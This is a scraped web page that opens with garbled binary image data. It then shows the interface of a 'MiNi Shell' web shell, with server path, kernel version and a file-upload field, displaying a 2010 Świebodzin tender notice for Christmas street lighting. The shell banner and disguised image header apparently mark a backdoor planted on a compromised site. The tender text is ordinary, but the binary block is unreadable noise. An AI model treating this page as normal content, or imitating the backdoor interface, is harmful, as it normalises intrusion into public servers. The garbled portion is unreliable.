JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/378480-N-2010.html

<p class="kh_header"><b>Świebodzin: Kompleksowe wykonanie usługi p.n.: Wykonanie oświetlenia świątecznego miasta Świebodzin</b><br>
<b>Numer ogłoszenia: 378480 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzin , ul. Rynkowa 2, 66-200 Świebodzin, woj. lubuskie, tel. 068 4750916, faks 068 4750918.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swiebodzin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe wykonanie usługi p.n.: Wykonanie oświetlenia świątecznego miasta Świebodzin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowe wykonanie usługi p.n.: Wykonanie oświetlenia świątecznego miasta Świebodzin wg następującego zakresu:

1.1. Etap I:
I. Przegląd i naprawa oświetlenia świątecznego na terenie miasta Świebodzin - dekoracja zamawiającego:

1. Naprawa słupowych elementów dekoracyjnych - szt. 70, polegająca na wymianie węża świetlnego na węża w technologii LED z diodami LED, następujących dekoracji:

a) gwiazda betlejemska - szt. 14 wymiana na węża świetlnego LED o dł. 1 szt. - 8 mb, kolor diod żółty,
b) choinka - szt. 16 wymiana na węża świetlnego LED o dł. 1 szt. - 6 mb, kolor diod zielony,
c) śnieżynka - szt. 40 wymiana na węża świetlnego LED o dł. 1 szt. - 10 mb, kolor diod biały.

2. Przegląd i naprawa sznurów świetlnych - szt. 10 o łącznej dł. 885 mb (10 szt. x 88,5 mb), gwint E-27, moc żarówek 15 W, odstęp żarówek na sznurze-0,70 cm.

3. Przegląd i naprawa kurtyn świetlnych montowanych na drzewach - kpl. 13.

4. Przegląd i naprawa kompletów choinkowych - kpl. 1 (1 kpl. = 7 szt. kurtyn świetlnych, każda kurtyna: typu LED, kolor diod: biały-zimny, kolor kabla: czarny, o wymiarach: szer. 2,0 m x dł. 9,0 m, 25 nitek po 90 LED na nitce = 2250 szt., moc 280 W).

1.2. Etap II:
I. Zakup oświetlenia świątecznego przez Wykonawcę:

1. Zakup słupowych elementów dekoracyjnych - szt. 5:

a) choinka - zarys z żarówek koloru zielonego, element dekoracyjny z żarówek koloru żółtego, o wymiarach: wys.1,40 m, szer. 0,95 m - szt. 1,
b) girlanda - zarys z żarówek koloru czerwonego, element dekoracyjny z żarówek koloru żółtego, o wymiarach: wys. 2,15 m, szer. -1,00 m - szt. 1,
c) dzwonki - zarys z żarówek LED koloru żółtego, element dekoracyjny z żarówek LED koloru czerwonego, o wymiarach: wys. 1,80 m, szer. 1,00 m - szt. 3.

2. Zakup kurtyn świetlnych montowanych na drzewach - kpl. 2 (1 kpl. = 1 szt. kurtyny świetlnej, każda kurtyna: typu LED, kolor diod: biały-zimny, kolor kabla: czarny, o wymiarach: szer. 2,0 m x dł. 5,0 m, 25 nitek po 57 LED na nitce = 1425 szt., moc 132,5 W).

3. Zakup kompletów choinkowych montowanych na choinkach - kpl. 1 (1 kpl. = 5 szt. kurtyn świetlnych, każda kurtyna: typu LED, kolor diod: biały-zimny, kolor kabla: czarny, o wymiarach: szer. 2,0 m x dł. 9,0 m, 25 nitek po 90 LED na nitce = 2250 szt., moc 280 W).

4. Wykonanie gwiazdy na czubek choinki - szt. 2:

a) gwiazda z węża świetlnego typu LED, kolor diod: biały-zimny, o wymiarach: wys. 60 cm x szer. 50 cm - szt. 1,
b) gwiazda z węża świetlnego typu LED, kolor diod: biały-zimny, o wymiarach: wys. 35 cm x szer. 30 cm - szt. 1.

5. Zakup żarówek - szt. 700 białych - kula mleczna, szkło przyćmione, nić wolframowa o gwincie E-27, moc 15 W, odstęp żarówek na sznurze-0,70 cm, w celu zmiany wystroju ul. Głogowskiej wraz z zapasem na wymianę spalonych i niesprawnych.

6. Zakup liniowo-elewacyjnych elementów dekoracyjnych - szt. 2:

a) baner z napisem WESOŁYCH ŚWIĄT w kolorze czerwonym z elementami dekoracyjnymi oraz z linami np. stalowymi i hakami mocowanymi do ścian budynków, odległość pomiędzy budynkami ok. 12 m, o wymiarach: wys. od 1,60 m do 1,70 m, szer. od 4,60 m do 4,70 m - szt. 1,
b) baner o świątecznych akcentach z efektem ruchu światła w kolorze białym-zimnym z linami np. stalowymi i hakami mocowanymi do ścian budynków, odległość pomiędzy budynkami ok. 15 m, o wymiarach: wys. od 0,70 m do 0,80 m, szer. od 4,00 m do 4,10 m - szt. 1.

II. Montaż oświetlenia świątecznego na terenie miasta Świebodzin - dekoracja zamawiającego:

1. Montaż dekoracyjnego oświetlenia świątecznego - szt. 205 na słupach oświetlenia drogowego na terenie miasta Świebodzin, w następujących miejscach:

a) ul. Sulechowska - gwiazda, kolor żółty - szt. 21
b) ul. Kolejowa - gwiazda, kolor żółty - szt. 3
c) ul. M. Żymierskiego - choinka, kolor zielony - szt. 7
d) ul. Generała Świerczewskiego (od Hotelu SEN do Lecznicy Zwierząt) - choinka, kolor zielony - szt. 13
e) ul. Generała Świerczewskiego (k/Hali Sportowej) - choinka, kolor zielony - szt. 4
f) ul. Sobieskiego - choinka, kolor zielony - szt. 13
g) ul. Wojska Polskiego:
- słupy rurowe - choinka, kolor zielony - szt. 2 
- słupy betonowe - choinka, kolor zielony - szt. 8
h) ul. Łąki Zamkowe - słupy rurowe - choinka, kolor zielony - szt. 8
i) ul. Grottgera - słupy rurowe - choinka, kolor zielony - szt. 5  
j) w ciągu ulic: ul. Konarskiego, ul. Łukowej i ul. Generała  Świerczewskiego (do Eltermy) - śnieżynki, kolor biały - szt. 27
k) ul. Poznańska - do torowiska - słupy rurowe - śnieżynki, kolor biały - szt. 8
l) ul. Poznańska - od torowiska, wyjazd w kierunku Poznania:
- słupy rurowe - śnieżynki, kolor biały - szt. 4
- słupy betonowe - śnieżynki, kolor biały - szt. 7 
m) ul. Wałowa, ul. 30 Stycznia - słupy rurowe - śnieżynki, kolor biały - szt. 11
n) w ciągu ulic: ul. J. Piłsudskiego, ul. Plac Wolności, ul. Kawaleryjska, ul. Gen. Sikorskiego:
- girlanda - zarys z żarówek koloru czerwonego, element dekoracyjny z żarówek koloru żółtego, o wymiarach: wys. 2,15 m, szer. -1,00 m - szt. 15
- choinka - zarys z żarówek koloru zielonego, element dekoracyjny z żarówek koloru żółtego, o wymiarach: wys.1,40 m, szer. 0,95 m - szt. 7
o) ul. Sobieskiego - słupy rurowe - choinka, żarówki kolor zielony, żółty, o wymiarach: wys. 1,40 m,  szer. 0,95 m - szt. 10
p) ul. Łużycka - słupy rurowe - dzwonki, żarówki kolor żółty, czerwony, o wymiarach: wys. 1,80 m, szer. 1,00 m - szt. 20
q) ul. Osiedlowa - słupy rurowe - dzwonki typu LED, kolor żółty, czerwony, o wymiarach: wys. 1,80 m, szer. 1,00 m - szt. 12
		
2. Montaż kurtyn świetlnych na drzewach oraz podłączenie do zasilania elektrycznego przy użyciu podnośnika - kpl. 15 (po 1 kpl. na drzewie), w następujących miejscach:

a) ul. J. Piłsudskiego k/Starostwa Powiatowego - kpl. 1
b) ul. Kolejowa - wjazd na wiadukt - kpl. 1
c) Plac Wolności k/Poczty Polskiej - kpl. 1
d) ul. Sulechowska - kpl. 1
e) skrzyżowanie ulic: ul. Łużyckiej i ul. Pułaskiego k/Biedronki - kpl. 1 (1 kpl. = 2 szt. zespolonych kurtyn świetlnych)
f) skrzyżowanie ulic: ul. Sulechowskiej i ul. Poprzecznej - kpl. 1
g) skrzyżowanie ulic: ul. Sulechowskiej i ul. Słonecznej k/przedszkola - kpl. 1
h) skrzyżowanie ulic: ul. Łużyckiej i ul. Osiedlowej k/Szkoły nr 3 - kpl. 1
i) skrzyżowanie ulic: ul. Łużyckiej i ul. Matejki k/byłej siedziby Policji - kpl. 1
j) skrzyżowanie ulic: ul. Poznańskiej i ul. Łąki Zamkowe k/CPN - kpl. 1
k) skrzyżowanie ulic: ul. Żymierskiego k/Biedronki - kpl. 1
l) skrzyżowanie ulic: ul. Konarskiego i ul. Topolowej - kpl. 1
m) skrzyżowanie ulic: ul. Konarskiego i ul. Łukowej - kpl. 1
n) skrzyżowanie ulic: ul. Wojska Polskiego i ul. Partyzanckiej - kpl. 1
o) ul. 30- Stycznia k/Szkoły nr 5 - kpl. 1
p) Plac Browarniany k/Kościoła p.w. Matki Bożej Królowej Polski - kpl.1

3. Montaż kompletów choinkowych na choinkach oraz podłączenie do zasilania elektrycznego - kpl. 2, w następujących miejscach:
  
a) montaż kompletów choinkowych na choinkę - kpl. 1 (1 kpl. = 7 szt. kurtyn świetlnych, każda kurtyna: typu LED, kolor diod: biały-zimny, kolor kabla: czarny, o wymiarach:   szer. 2,0 m x dł. 9,0 m, 25 nitek po 90 LED na nitce = 2250 szt, moc 280 W) przed wejściem do Ratusza na Placu Jana Pawła II z montażem żarówek stroboskopowych typu ZSTR - szt. 10 i przystrojeniem choinki - szt. 1,
b) montaż kompletów choinkowych na choinkę - kpl. 1 (1 kpl. = 5 szt. kurtyn świetlnych, każda kurtyna: typu LED, kolor diod: biały-zimny, kolor kabla: czarny, o wymiarach:  szer. 2,0 m x dł. 9,0 m, 25 nitek po 90 LED na nitce = 2250 szt., moc 280 W) na ul. Gen. Sikorskiego - Rondo Solidarności  z przystrojeniem choinki - szt. 1.

4. Montaż gwiazdy na czubek choinki - szt. 2, w następujących miejscach:

a) gwiazda z węża świetlnego typu LED, kolor diod: biały-zimny, o wymiarach: wys. 60 cm   x szer. 50 cm na Placu Jana Pawła II k/Ratusza - szt. 1,
b) gwiazda z węża świetlnego typu LED, kolor diod: biały-zimny, o wymiarach: wys. 35 cm  x szer. 30 cm Rondo Solidarności - szt. 1.

5. Montaż oświetlenia liniowo-elewacyjnego elementów dekoracyjnych - szt. 2, w następujących miejscach:

a) montaż baneru z napisem WESOŁYCH ŚWIĄT w kolorze czerwonym z elementami dekoracyjnymi na linach np. stalowych do haków na ścianach budynków nr 7 i 8 na ul. Głogowskiej, odległość pomiędzy budynkami ok. 12 m, o wymiarach: wys. od 1,60 m do 1,70 m, szer. od 4,60 m do 4,70 m - napis czytany od strony ul. J. Piłsudskiego - szt. 1,
b) montaż baneru o świątecznych akcentach z efektem ruchu światła w kolorze białym-zimnym na linach np. stalowych do haków na ścianach budynków nr 10 i 17 na ul. Głogowskiej, odległość pomiędzy budynkami ok. 15 m, o wymiarach: wys. od 0,70 m do 0,80 m, szer. od 4,00 m do 4,10 m - szt. 1.

6. Montaż sznurów świetlnych przy użyciu drabiny - szt. 10 o łącznej dł. 885 mb (10 szt. x 88,5 mb), gwint E-27, moc żarówek 15 W, odstęp żarówek na sznurze-0,70 cm w centrum miasta Świebodzina oraz na ulicach przyległych do centrum oraz podłączenie  do zasilania elektrycznego, w następujących miejscach: 

a) wzdłuż ul. Głogowskiej i przez ul. Kilińskiego, na odcinku od ul. J. Piłsudskiego do ul. Kilińskiego,
b) na deptaku koło Ratusza: ul. Kościelna, Plac Jana Pawła II, ul. 1- Maja  i ciąg pieszy k/b. PZU, rozwieszenie przewodów oświetleniowych na latarniach.

7. Wymiana źródeł światła w sznurach świetlnych, żarówki - szt. 200, w tym: 2-krotne uzupełnienie wyeksploatowanych i brakujących żarówek w terminach przed 24.12.2010 r. i 31.12.2010 r. - materiał wykonawcy.

1.3. Etap III:
I. Demontaż oświetlenia świątecznego na terenie miasta Świebodzin, obejmuje:

1. Demontaż dekoracyjnego oświetlenia świątecznego ze słupów oświetlenia drogowego - szt. 205 
2. Demontaż kurtyn świetlnych - kpl. 15
3. Demontaż kompletów choinkowych - kpl. 2
4. Demontaż gwiazd z choinek - szt. 2
5. Demontaż banerów oświetlenia świątecznego - szt. 2
6. Demontaż sznurów świetlnych - szt. 10 

2. Szczegółowy zakres prac do wykonania i warunki odbioru zostały określone w kosztorysach ofertowych i specyfikacji technicznej wykonania i odbioru robót, stanowiących załączniki do niniejszej SIWZ.

3. Koszty zakupu i dostawy materiałów, koszty przeglądu, naprawy, montażu i podłączenia dekoracji, koszty przeprowadzenia prób i badań technicznych oraz uzyskania uzgodnień i zezwoleń, które wymagane są do eksploatacji przedmiotu zamówienia, koszty zabezpieczenia i oznakowania terenu prac, koszty demontażu dekoracji wraz z kosztami transportu zdemontowanych dekoracji do miejsca wskazanego przez Zamawiającego, koszty uporządkowania terenu prac oraz wszelkie inne koszty związane z realizacją przedmiotu zamówienia, po stronie Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 51.11.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi odpowiadające swoim rodzajem przedmiotowi zamówienia o wartości co najmniej 60 000,00 zł brutto każda wraz z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje kierownikiem prac posiadającym:

- uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci elektrycznych,
- wpis na listę członków właściwej Izby Inżynierów Budownictwa potwierdzony aktualnym zaświadczeniem wydanym przez tę izbę z określonym w niej terminem ważności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na równowartość co najmniej 60 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych. 2. Pisemne zobowiązanie podmiotów, o których mowa w Rozdziale X ust. 2 SIWZ, o ile wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych. 3. Pełnomocnictwo w oryginale albo notarialnie potwierdzona kopia (w przypadku jego składania).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swiebodzin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 49.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2010 godzina 12:00, miejsce: Urząd Miejski w Świebodzinie, ul. Rynkowa 2, 66-200 Świebodzin, pok. nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com